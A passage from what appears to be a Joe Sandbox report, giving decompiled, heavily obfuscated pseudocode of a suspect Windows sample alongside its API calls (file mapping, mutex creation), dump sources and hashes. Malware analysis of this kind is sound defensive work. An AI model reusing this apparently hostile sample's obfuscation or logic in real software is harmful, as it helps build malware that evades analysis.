                                                                                                                                                                                                                                                                      						WideCharToMultiByte(_v128, _v124, _v120, _v116, _v112, _v108, _v104, _v100);
                                                                                                                                                                                                                                                                      						_v36 = _v36 + 3;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_v8 = _v8 ^ 0x00002565;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_a4 + 0x10)) = 0xa;
                                                                                                                                                                                                                                                                      					 *0x0121D604 = 1;
                                                                                                                                                                                                                                                                      					 *(_a4 + 0xbadbdd) = 1;
                                                                                                                                                                                                                                                                      					 *(_a4 + 0x38) = 1;
                                                                                                                                                                                                                                                                      					_t446 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t446 + 0x3c)) = 0x4e;
                                                                                                                                                                                                                                                                      					 *0x0121D630 = 1;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_a4 + 0xbadbfd)) = 2;
                                                                                                                                                                                                                                                                      					 *0x0121D664 = 0;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_a4 + 0x78)) = 0xe;
                                                                                                                                                                                                                                                                      					 *0x0121D66C = 0xa;
                                                                                                                                                                                                                                                                      					 *0x121d67c = 0;
                                                                                                                                                                                                                                                                      					_t296 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t296 + 0x9c)) = 0x20;
                                                                                                                                                                                                                                                                      					 *(_a4 + 0xa4) = 0;
                                                                                                                                                                                                                                                                      					 *(_a4 + 0xac) = 1;
                                                                                                                                                                                                                                                                      					 *(_a4 + 0xb0) = 0;
                                                                                                                                                                                                                                                                      					 *(_a4 + 0xb4) = 0;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_a4 + 0xb8)) = 0xf;
                                                                                                                                                                                                                                                                      					_t454 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					 *(_t454 + 0xbadc71) = 1;
                                                                                                                                                                                                                                                                      					_t376 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t376 + 0xbadc81)) = 0x26;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_a4 + 0xdc)) = 8;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_a4 + 0xe0)) = 2;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_a4 + 0xe4)) = 0xc;
                                                                                                                                                                                                                                                                      					 *(_a4 + 0xec) = 1;
                                                                                                                                                                                                                                                                      					 *(_a4 + 0xf4) = 0;
                                                                                                                                                                                                                                                                      					 *(_a4 + 0xfc) = 1;
                                                                                                                                                                                                                                                                      					_v16 = _v16 ^ 0x000026d4;
                                                                                                                                                                                                                                                                      					_v16 = _v16 + 0xe5;
                                                                                                                                                                                                                                                                      					_v20 = _v20 + 0x2674;
                                                                                                                                                                                                                                                                      					_v28 = _v28 ^ 0x00000047;
                                                                                                                                                                                                                                                                      					_v12 = _v12 ^ 0x00002628;
                                                                                                                                                                                                                                                                      					_v32 = _v32 - 0x145;
                                                                                                                                                                                                                                                                      					_v24 = _v24 + 0x181;
                                                                                                                                                                                                                                                                      					_v24 = _v24 + 0x10f;
                                                                                                                                                                                                                                                                      					_v20 = _v20 ^ 0x000001cd;
                                                                                                                                                                                                                                                                      					_v8 = _v8 ^ 0x000003b1;
                                                                                                                                                                                                                                                                      					_v8 = _v8 + 0x166;
                                                                                                                                                                                                                                                                      					_v12 = _v12 + 0x4c;
                                                                                                                                                                                                                                                                      					_v12 = _v12 ^ 0x000001e2;
                                                                                                                                                                                                                                                                      					_v28 = _v28 - 0x139;
                                                                                                                                                                                                                                                                      					_t468 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					_v64 = _t468;
                                                                                                                                                                                                                                                                      					_v60 = _v12;
                                                                                                                                                                                                                                                                      					_v56 = _v20 + 0x81;
                                                                                                                                                                                                                                                                      					_v52 = _v12 - 0x231;
                                                                                                                                                                                                                                                                      					_v48 = _v12 - 0x25b;
                                                                                                                                                                                                                                                                      					_v44 = _v16;
                                                                                                                                                                                                                                                                      					_v40 = _v12 - 0x122;
                                                                                                                                                                                                                                                                      					_v8 = E01198850(_v64, _v60, _v56, _v52, _v48, _v44, _v40);
                                                                                                                                                                                                                                                                      					_v24 = _v24 - 0x1fe;
                                                                                                                                                                                                                                                                      					_v32 = _v32 ^ 0x000002b3;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return _v32 + 0x373;
                                                                                                                                                                                                                                                                      			}













































                                                                                                                                                                                                                                                                      0x0118280e
                                                                                                                                                                                                                                                                      0x0118281a
                                                                                                                                                                                                                                                                      0x01182826
                                                                                                                                                                                                                                                                      0x01182831
                                                                                                                                                                                                                                                                      0x0118283d
                                                                                                                                                                                                                                                                      0x01182843
                                                                                                                                                                                                                                                                      0x0118284c
                                                                                                                                                                                                                                                                      0x0118285b
                                                                                                                                                                                                                                                                      0x01182b38
                                                                                                                                                                                                                                                                      0x01182b46
                                                                                                                                                                                                                                                                      0x01182b79
                                                                                                                                                                                                                                                                      0x01182b8d
                                                                                                                                                                                                                                                                      0x01182ba4
                                                                                                                                                                                                                                                                      0x01182baa
                                                                                                                                                                                                                                                                      0x01182bba
                                                                                                                                                                                                                                                                      0x01182bcb
                                                                                                                                                                                                                                                                      0x01182bd2
                                                                                                                                                                                                                                                                      0x01182bed
                                                                                                                                                                                                                                                                      0x01182c00
                                                                                                                                                                                                                                                                      0x01182c03
                                                                                                                                                                                                                                                                      0x01182c1e
                                                                                                                                                                                                                                                                      0x01182c33
                                                                                                                                                                                                                                                                      0x01182c47
                                                                                                                                                                                                                                                                      0x01182c56
                                                                                                                                                                                                                                                                      0x01182c62
                                                                                                                                                                                                                                                                      0x01182c68
                                                                                                                                                                                                                                                                      0x01182c6e
                                                                                                                                                                                                                                                                      0x01182c8d
                                                                                                                                                                                                                                                                      0x01182caf
                                                                                                                                                                                                                                                                      0x01182cba
                                                                                                                                                                                                                                                                      0x01182cd3
                                                                                                                                                                                                                                                                      0x01182cdf
                                                                                                                                                                                                                                                                      0x01182cf9
                                                                                                                                                                                                                                                                      0x01182d03
                                                                                                                                                                                                                                                                      0x01182d22
                                                                                                                                                                                                                                                                      0x01182d31
                                                                                                                                                                                                                                                                      0x01182d49
                                                                                                                                                                                                                                                                      0x01182d60
                                                                                                                                                                                                                                                                      0x01182d6a
                                                                                                                                                                                                                                                                      0x01182d8d
                                                                                                                                                                                                                                                                      0x01182b43
                                                                                                                                                                                                                                                                      0x01182b43
                                                                                                                                                                                                                                                                      0x01182861
                                                                                                                                                                                                                                                                      0x0118286a
                                                                                                                                                                                                                                                                      0x01182878
                                                                                                                                                                                                                                                                      0x01182888
                                                                                                                                                                                                                                                                      0x0118289d
                                                                                                                                                                                                                                                                      0x011828a8
                                                                                                                                                                                                                                                                      0x011828af
                                                                                                                                                                                                                                                                      0x011828b5
                                                                                                                                                                                                                                                                      0x011828c4
                                                                                                                                                                                                                                                                      0x011828d9
                                                                                                                                                                                                                                                                      0x011828e9
                                                                                                                                                                                                                                                                      0x011828f6
                                                                                                                                                                                                                                                                      0x01182905
                                                                                                                                                                                                                                                                      0x0118290f
                                                                                                                                                                                                                                                                      0x01182919
                                                                                                                                                                                                                                                                      0x0118291e
                                                                                                                                                                                                                                                                      0x01182933
                                                                                                                                                                                                                                                                      0x01182941
                                                                                                                                                                                                                                                                      0x0118294e
                                                                                                                                                                                                                                                                      0x0118295b
                                                                                                                                                                                                                                                                      0x01182970
                                                                                                                                                                                                                                                                      0x01182982
                                                                                                                                                                                                                                                                      0x01182988
                                                                                                                                                                                                                                                                      0x0118299b
                                                                                                                                                                                                                                                                      0x011829a1
                                                                                                                                                                                                                                                                      0x011829af
                                                                                                                                                                                                                                                                      0x011829bc
                                                                                                                                                                                                                                                                      0x011829c9
                                                                                                                                                                                                                                                                      0x011829d6
                                                                                                                                                                                                                                                                      0x011829e3
                                                                                                                                                                                                                                                                      0x011829f8
                                                                                                                                                                                                                                                                      0x01182a0c
                                                                                                                                                                                                                                                                      0x01182a18
                                                                                                                                                                                                                                                                      0x01182a23
                                                                                                                                                                                                                                                                      0x01182a32
                                                                                                                                                                                                                                                                      0x01182a3d
                                                                                                                                                                                                                                                                      0x01182a49
                                                                                                                                                                                                                                                                      0x01182a55
                                                                                                                                                                                                                                                                      0x01182a60
                                                                                                                                                                                                                                                                      0x01182a6c
                                                                                                                                                                                                                                                                      0x01182a78
                                                                                                                                                                                                                                                                      0x01182a83
                                                                                                                                                                                                                                                                      0x01182a8c
                                                                                                                                                                                                                                                                      0x01182a98
                                                                                                                                                                                                                                                                      0x01182aaa
                                                                                                                                                                                                                                                                      0x01182aad
                                                                                                                                                                                                                                                                      0x01182ab3
                                                                                                                                                                                                                                                                      0x01182ab9
                                                                                                                                                                                                                                                                      0x01182ac5
                                                                                                                                                                                                                                                                      0x01182ad1
                                                                                                                                                                                                                                                                      0x01182adc
                                                                                                                                                                                                                                                                      0x01182ae2
                                                                                                                                                                                                                                                                      0x01182aee
                                                                                                                                                                                                                                                                      0x01182b15
                                                                                                                                                                                                                                                                      0x01182b21
                                                                                                                                                                                                                                                                      0x01182b2d
                                                                                                                                                                                                                                                                      0x01182b2d
                                                                                                                                                                                                                                                                      0x01182da3

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetCurrentActCtx.KERNEL32(?), ref: 01182BD2
                                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 01182C8D
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CreateCurrentFile
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2953019475-0
                                                                                                                                                                                                                                                                      • Opcode ID: 219dbe731949f48281c7bf2b6438d8a4f85fd31d21d66281851d213685234194
                                                                                                                                                                                                                                                                      • Instruction ID: 7e7b060c1c291c60358f67dd49b3070d17f8d528f7a3a67d1180140329e74ad1
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 219dbe731949f48281c7bf2b6438d8a4f85fd31d21d66281851d213685234194
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2202DD71A00109DFEB08CF98D594BAEBBF5FF88304F108269D919AB385D735AA41CF94
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 98%
                                                                                                                                                                                                                                                                      			E01181000() {
                                                                                                                                                                                                                                                                      				intOrPtr _t212;
                                                                                                                                                                                                                                                                      				intOrPtr _t248;
                                                                                                                                                                                                                                                                      				signed int _t249;
                                                                                                                                                                                                                                                                      				intOrPtr _t304;
                                                                                                                                                                                                                                                                      				intOrPtr _t305;
                                                                                                                                                                                                                                                                      				intOrPtr _t319;
                                                                                                                                                                                                                                                                      				intOrPtr _t328;
                                                                                                                                                                                                                                                                      				intOrPtr _t329;
                                                                                                                                                                                                                                                                      				intOrPtr _t336;
                                                                                                                                                                                                                                                                      				intOrPtr _t355;
                                                                                                                                                                                                                                                                      				intOrPtr _t368;
                                                                                                                                                                                                                                                                      				short** _t433;
                                                                                                                                                                                                                                                                      				void* _t435;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t433 = _t435 - 0x64;
                                                                                                                                                                                                                                                                      				_t433[0x18] = _t433[0x1b];
                                                                                                                                                                                                                                                                      				_t433[0x17] = _t433[0x1c] - 0xbd;
                                                                                                                                                                                                                                                                      				_t433[0x13] = _t433[0x1c] ^ 0x000003e3;
                                                                                                                                                                                                                                                                      				_t433[0x14] = _t433[0x1e] ^ 0x000001fc;
                                                                                                                                                                                                                                                                      				_t433[0x15] = _t433[0x1f] ^ 0x0000253b;
                                                                                                                                                                                                                                                                      				_t433[0x12] = _t433[0x1c] - 0x1df;
                                                                                                                                                                                                                                                                      				_t433[0x16] = _t433[0x1e] ^ 0x00000cc6;
                                                                                                                                                                                                                                                                      				if(_t433[0x16] < (_t433[0x13] ^ 0x00000290)) {
                                                                                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                                                                                      					return  &(_t433[0x13][0xef]);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if(_t433[0x15] >  &(_t433[0x14][0x17f])) {
                                                                                                                                                                                                                                                                      					_t212 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					_t108 = _t212 + 0xdc; // 0x8
                                                                                                                                                                                                                                                                      					if(_t433[0x18] >= ( *_t108 - _t433[0x13] | _t433[0x1d][0x76])) {
                                                                                                                                                                                                                                                                      						_t368 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						if( *((intOrPtr*)(_t368 + 0xb4)) >= (_t433[0x17] | _t433[0x1d][0x70] | _t433[0x16])) {
                                                                                                                                                                                                                                                                      							 *(_t433 - 8) =  &(_t433[0x12][0x12cc]) ^ 0x00002687;
                                                                                                                                                                                                                                                                      							 *(_t433 - 4) = (_t433[0x17] ^ _t433[0x16]) - _t433[0x1d][0x76];
                                                                                                                                                                                                                                                                      							 *_t433 = _t433[0x1d][0x5d6e38] ^ _t433[0x1d][0x5c];
                                                                                                                                                                                                                                                                      							_t433[1] = (_t433[0x16] | _t433[0x12]) ^ 0x0000283a;
                                                                                                                                                                                                                                                                      							_t304 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_t305 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_t433[2] = ( *(_t304 + 0xc4) & _t433[0x15]) -  *((intOrPtr*)(_t305 + 0xbadbb1));
                                                                                                                                                                                                                                                                      							_t433[3] = _t433[0x1d][0x68] -  *0x121d6a0 - _t433[0x1d][0x72];
                                                                                                                                                                                                                                                                      							_t433[4] = _t433[0x1d][0x58] &  *0x121d628 ^ _t433[0x1d][0x5d6e32];
                                                                                                                                                                                                                                                                      							_t433[5] = _t433[0x1d][0x56] | 0x00002598 | _t433[0x16];
                                                                                                                                                                                                                                                                      							WideCharToMultiByte( *(_t433 - 8),  *(_t433 - 4),  *_t433, _t433[1], _t433[2], _t433[3], _t433[4], _t433[5]);
                                                                                                                                                                                                                                                                      							 *(_t433 - 0x20) =  &(_t433[0x16][0x136a]);
                                                                                                                                                                                                                                                                      							 *(_t433 - 0x1c) = _t433[0x15] + _t433[0x1d][0x5d6e40] & _t433[0x1d][0x5d6e54];
                                                                                                                                                                                                                                                                      							 *(_t433 - 0x18) = _t433[0x14] - _t433[0x16];
                                                                                                                                                                                                                                                                      							 *(_t433 - 0x14) = _t433[0x14] & _t433[0x18] & 0x000026d4;
                                                                                                                                                                                                                                                                      							 *(_t433 - 0x10) = _t433[0x13] * 0x00002801 | 0x000027b9;
                                                                                                                                                                                                                                                                      							_t319 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							 *(_t433 - 0xc) =  *(_t319 + 0xbadc29) ^ _t433[0x1d][0x70];
                                                                                                                                                                                                                                                                      							CreateFileMappingA( *(_t433 - 0x20),  *(_t433 - 0x1c),  *(_t433 - 0x18),  *(_t433 - 0x14),  *(_t433 - 0x10),  *(_t433 - 0xc));
                                                                                                                                                                                                                                                                      							_t248 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_t193 = _t248 + 0x3c; // 0x161485
                                                                                                                                                                                                                                                                      							 *(_t433 - 0x2c) =  *0x0121D6A8 -  *_t193 | 0x00002598;
                                                                                                                                                                                                                                                                      							 *(_t433 - 0x28) = _t433[0x15] - _t433[0x18] - _t433[0x17];
                                                                                                                                                                                                                                                                      							_t249 =  *0x121d6cc; // 0x8
                                                                                                                                                                                                                                                                      							 *(_t433 - 0x24) = _t249 & _t433[0x16];
                                                                                                                                                                                                                                                                      							CreateMutexA( *(_t433 - 0x2c),  *(_t433 - 0x28),  *(_t433 - 0x24));
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t328 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      				_t23 = _t328 + 0xac; // 0x1a0e74
                                                                                                                                                                                                                                                                      				_t329 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t329 + 0xac)) = _t433[0x1d][0x20] -  *0x121d68c +  *_t23 + 0x2ec7d0;
                                                                                                                                                                                                                                                                      				_t433[0xc] =  &(_t433[0x18][0x45]);
                                                                                                                                                                                                                                                                      				_t433[0xd] =  &(_t433[0x18][4]);
                                                                                                                                                                                                                                                                      				_t433[0xe] = _t433[0x15] ^ 0x000027b9;
                                                                                                                                                                                                                                                                      				_t433[0xf] = _t433[0x1d];
                                                                                                                                                                                                                                                                      				_t433[0x10] = _t433[0x15] ^ 0x000026d4;
                                                                                                                                                                                                                                                                      				_t433[0x11] = _t433[0x18] ^ 0x000003ec;
                                                                                                                                                                                                                                                                      				_push(_t433[0x11]);
                                                                                                                                                                                                                                                                      				_t433[0x17] = E01198330(_t433[0xc], _t433[0xd], _t433[0xe], _t433[0xf], _t433[0x10]);
                                                                                                                                                                                                                                                                      				_t433[0x18] = _t433[0x18] ^ 0x0000031f;
                                                                                                                                                                                                                                                                      				_t336 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      				_t433[0x1d][0x60] = ( *(_t336 + 0xbadbfd) ^ _t433[0x1d][0x1c]) + _t433[0x1d][0x60] - 0x114023;
                                                                                                                                                                                                                                                                      				if(_t433[0x1d][0x6e] == _t433[0x1d][0x70]) {
                                                                                                                                                                                                                                                                      					_t433[0x1d][0x20] = _t433[0x1d][0x76] - _t433[0x1d][0xa] ^ _t433[0x1d][0x20];
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(0x121d6a8)) =  *((intOrPtr*)(0x121d6a8)) - (_t433[0x1d][0x76] - _t433[0x1d][0x58] ^ 0x000a4f8c);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t433[6] = _t433[0x13] + 0x2b3;
                                                                                                                                                                                                                                                                      				_t433[7] = _t433[0x12] ^ 0x0000032e;
                                                                                                                                                                                                                                                                      				_t433[8] = 0x121d5f0;
                                                                                                                                                                                                                                                                      				_t433[9] = _t433[0x18] - 0x122;
                                                                                                                                                                                                                                                                      				_t433[0xa] =  &(_t433[0x17][0x61]);
                                                                                                                                                                                                                                                                      				_t433[0xb] = _t433[0x15] + 0x2565;
                                                                                                                                                                                                                                                                      				_t433[0x17] = E01183250(_t433[6], _t433[7], _t433[8], _t433[9], _t433[0xa], _t433[0xb]);
                                                                                                                                                                                                                                                                      				_t433[0x17] =  &(_t433[0x17][0x6a]);
                                                                                                                                                                                                                                                                      				_t433[0x14] = _t433[0x14] ^ 0x0000005e;
                                                                                                                                                                                                                                                                      				if(_t433[0x1d][0x3a] != _t433[0x1d][0x5d6dee]) {
                                                                                                                                                                                                                                                                      					_t355 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					_t107 = _t355 + 0xf4; // 0xd3256746
                                                                                                                                                                                                                                                                      					 *0x121d60c =  *_t107 + 0x32e9448;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				goto L11;
                                                                                                                                                                                                                                                                      			}
















                                                                                                                                                                                                                                                                      0x01181001
                                                                                                                                                                                                                                                                      0x0118100f
                                                                                                                                                                                                                                                                      0x0118101b
                                                                                                                                                                                                                                                                      0x01181027
                                                                                                                                                                                                                                                                      0x01181032
                                                                                                                                                                                                                                                                      0x0118103e
                                                                                                                                                                                                                                                                      0x0118104a
                                                                                                                                                                                                                                                                      0x01181055
                                                                                                                                                                                                                                                                      0x01181064
                                                                                                                                                                                                                                                                      0x011814ad
                                                                                                                                                                                                                                                                      0x011814bc
                                                                                                                                                                                                                                                                      0x011814bc
                                                                                                                                                                                                                                                                      0x01181076
                                                                                                                                                                                                                                                                      0x01181286
                                                                                                                                                                                                                                                                      0x0118128b
                                                                                                                                                                                                                                                                      0x011812a0
                                                                                                                                                                                                                                                                      0x011812b5
                                                                                                                                                                                                                                                                      0x011812c1
                                                                                                                                                                                                                                                                      0x011812d4
                                                                                                                                                                                                                                                                      0x011812e6
                                                                                                                                                                                                                                                                      0x0118130d
                                                                                                                                                                                                                                                                      0x0118131c
                                                                                                                                                                                                                                                                      0x01181327
                                                                                                                                                                                                                                                                      0x0118133e
                                                                                                                                                                                                                                                                      0x01181348
                                                                                                                                                                                                                                                                      0x0118136c
                                                                                                                                                                                                                                                                      0x01181390
                                                                                                                                                                                                                                                                      0x011813a4
                                                                                                                                                                                                                                                                      0x011813c7
                                                                                                                                                                                                                                                                      0x011813d5
                                                                                                                                                                                                                                                                      0x011813ff
                                                                                                                                                                                                                                                                      0x01181408
                                                                                                                                                                                                                                                                      0x01181417
                                                                                                                                                                                                                                                                      0x01181427
                                                                                                                                                                                                                                                                      0x01181431
                                                                                                                                                                                                                                                                      0x01181444
                                                                                                                                                                                                                                                                      0x0118145f
                                                                                                                                                                                                                                                                      0x0118146d
                                                                                                                                                                                                                                                                      0x01181478
                                                                                                                                                                                                                                                                      0x01181481
                                                                                                                                                                                                                                                                      0x0118148d
                                                                                                                                                                                                                                                                      0x01181490
                                                                                                                                                                                                                                                                      0x01181498
                                                                                                                                                                                                                                                                      0x011814a7
                                                                                                                                                                                                                                                                      0x011814a7
                                                                                                                                                                                                                                                                      0x011812c1
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x011812a0
                                                                                                                                                                                                                                                                      0x01181091
                                                                                                                                                                                                                                                                      0x01181097
                                                                                                                                                                                                                                                                      0x011810a4
                                                                                                                                                                                                                                                                      0x011810aa
                                                                                                                                                                                                                                                                      0x011810b9
                                                                                                                                                                                                                                                                      0x011810c2
                                                                                                                                                                                                                                                                      0x011810ce
                                                                                                                                                                                                                                                                      0x011810d4
                                                                                                                                                                                                                                                                      0x011810df
                                                                                                                                                                                                                                                                      0x011810eb
                                                                                                                                                                                                                                                                      0x011810f1
                                                                                                                                                                                                                                                                      0x0118110e
                                                                                                                                                                                                                                                                      0x0118111a
                                                                                                                                                                                                                                                                      0x01181125
                                                                                                                                                                                                                                                                      0x01181148
                                                                                                                                                                                                                                                                      0x01181160
                                                                                                                                                                                                                                                                      0x011811cc
                                                                                                                                                                                                                                                                      0x01181162
                                                                                                                                                                                                                                                                      0x01181192
                                                                                                                                                                                                                                                                      0x01181192
                                                                                                                                                                                                                                                                      0x011811d9
                                                                                                                                                                                                                                                                      0x011811e5
                                                                                                                                                                                                                                                                      0x011811e8
                                                                                                                                                                                                                                                                      0x011811f7
                                                                                                                                                                                                                                                                      0x01181203
                                                                                                                                                                                                                                                                      0x0118120f
                                                                                                                                                                                                                                                                      0x01181232
                                                                                                                                                                                                                                                                      0x0118123d
                                                                                                                                                                                                                                                                      0x01181246
                                                                                                                                                                                                                                                                      0x01181267
                                                                                                                                                                                                                                                                      0x01181269
                                                                                                                                                                                                                                                                      0x0118126f
                                                                                                                                                                                                                                                                      0x0118127b
                                                                                                                                                                                                                                                                      0x0118127b
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?), ref: 011813C7
                                                                                                                                                                                                                                                                      • CreateFileMappingA.KERNEL32 ref: 0118145F
                                                                                                                                                                                                                                                                      • CreateMutexA.KERNEL32(?,?,?), ref: 011814A7
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Create$ByteCharFileMappingMultiMutexWide
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 960205867-0
                                                                                                                                                                                                                                                                      • Opcode ID: 323553dd097489992747d81b6536816c2268abc860912e6e1064cceb55d1b46b
                                                                                                                                                                                                                                                                      • Instruction ID: 60071a05262af424646b0aadcbf72e6570fd4225b597fe200c0b6e565cc4665f
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 323553dd097489992747d81b6536816c2268abc860912e6e1064cceb55d1b46b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8BF10675600148DFDB18CFA8D594AAE77F6FF88304F648229EA198B395D735E842CF84
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 58%
                                                                                                                                                                                                                                                                      			E011895A0(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4, char _a8, char _a12) {
                                                                                                                                                                                                                                                                      				char _v0;
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				intOrPtr _v524;
                                                                                                                                                                                                                                                                      				intOrPtr _v528;
                                                                                                                                                                                                                                                                      				void* _v532;
                                                                                                                                                                                                                                                                      				intOrPtr _v536;
                                                                                                                                                                                                                                                                      				intOrPtr _v540;
                                                                                                                                                                                                                                                                      				intOrPtr _v544;
                                                                                                                                                                                                                                                                      				intOrPtr _v548;
                                                                                                                                                                                                                                                                      				intOrPtr _v552;
                                                                                                                                                                                                                                                                      				intOrPtr _v556;
                                                                                                                                                                                                                                                                      				intOrPtr _v560;
                                                                                                                                                                                                                                                                      				intOrPtr _v564;
                                                                                                                                                                                                                                                                      				intOrPtr _v568;
                                                                                                                                                                                                                                                                      				intOrPtr _v572;
                                                                                                                                                                                                                                                                      				intOrPtr _v576;
                                                                                                                                                                                                                                                                      				intOrPtr _v580;
                                                                                                                                                                                                                                                                      				intOrPtr _v584;
                                                                                                                                                                                                                                                                      				char _v724;
                                                                                                                                                                                                                                                                      				intOrPtr _v792;
                                                                                                                                                                                                                                                                      				intOrPtr _v800;
                                                                                                                                                                                                                                                                      				char _v804;
                                                                                                                                                                                                                                                                      				intOrPtr _v808;
                                                                                                                                                                                                                                                                      				char _v812;
                                                                                                                                                                                                                                                                      				signed int _t40;
                                                                                                                                                                                                                                                                      				char* _t47;
                                                                                                                                                                                                                                                                      				intOrPtr _t49;
                                                                                                                                                                                                                                                                      				intOrPtr _t61;
                                                                                                                                                                                                                                                                      				intOrPtr _t62;
                                                                                                                                                                                                                                                                      				intOrPtr _t66;
                                                                                                                                                                                                                                                                      				intOrPtr _t67;
                                                                                                                                                                                                                                                                      				int _t68;
                                                                                                                                                                                                                                                                      				intOrPtr _t69;
                                                                                                                                                                                                                                                                      				signed int _t70;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t69 = __esi;
                                                                                                                                                                                                                                                                      				_t67 = __edi;
                                                                                                                                                                                                                                                                      				_t66 = __edx;
                                                                                                                                                                                                                                                                      				_t61 = __ebx;
                                                                                                                                                                                                                                                                      				_t40 =  *0x121dd74; // 0x2bc0e270
                                                                                                                                                                                                                                                                      				_t41 = _t40 ^ _t70;
                                                                                                                                                                                                                                                                      				_v8 = _t40 ^ _t70;
                                                                                                                                                                                                                                                                      				if(_a4 != 0xffffffff) {
                                                                                                                                                                                                                                                                      					_push(_a4);
                                                                                                                                                                                                                                                                      					E0118DF2A(_t41);
                                                                                                                                                                                                                                                                      					_pop(_t62);
                                                                                                                                                                                                                                                                      				}
